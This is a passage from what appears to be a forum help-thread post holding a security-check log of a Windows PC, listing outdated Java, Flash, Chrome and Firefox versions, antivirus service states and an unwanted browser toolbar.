    Java SE Development Kit 7 Update 55 v.1.7.0.550 Warning! This software is no longer supported. Please uninstall it and use Java SDK 8 (jdk-8u144-windows-i586.exe).
    --------------------------- [ AdobeProduction ] ---------------------------
    Adobe Flash Player 27 ActiveX v.27.0.0.130
    Adobe Flash Player 27 NPAPI v.27.0.0.130
    Adobe AIR v.3.2.0.2070 Warning! Download Update
    Adobe Acrobat DC v.17.012.20098
    ------------------------------- [ Browser ] -------------------------------
    Google Chrome v.60.0.3112.113 Warning! Download Update
    Mozilla Firefox 38.0.5 (x86 pt-BR) v.38.0.5 Warning! Download Update
    --------------------------- [ RunningProcess ] ----------------------------
    C:\Program Files (x86)\Google\Chrome\Application\chrome.exe v.60.0.3112.113
    ------------------ [ AntivirusFirewallProcessServices ] -------------------
    Malwarebytes Service (MBAMService) - The service has stopped
    Windows Defender (WinDefend) - The service is running
    ---------------------------- [ UnwantedApps ] -----------------------------
    Skype Click to Call v.8.5.0.9167 Warning! Browser's toolbar. It can slow down the working of your browser and have violation privacy problems.
    ----------------------------- [ End of Log ] ------------------------------

    Programas.png

    Serviço1.png

    Edited by Murilo Beraldo
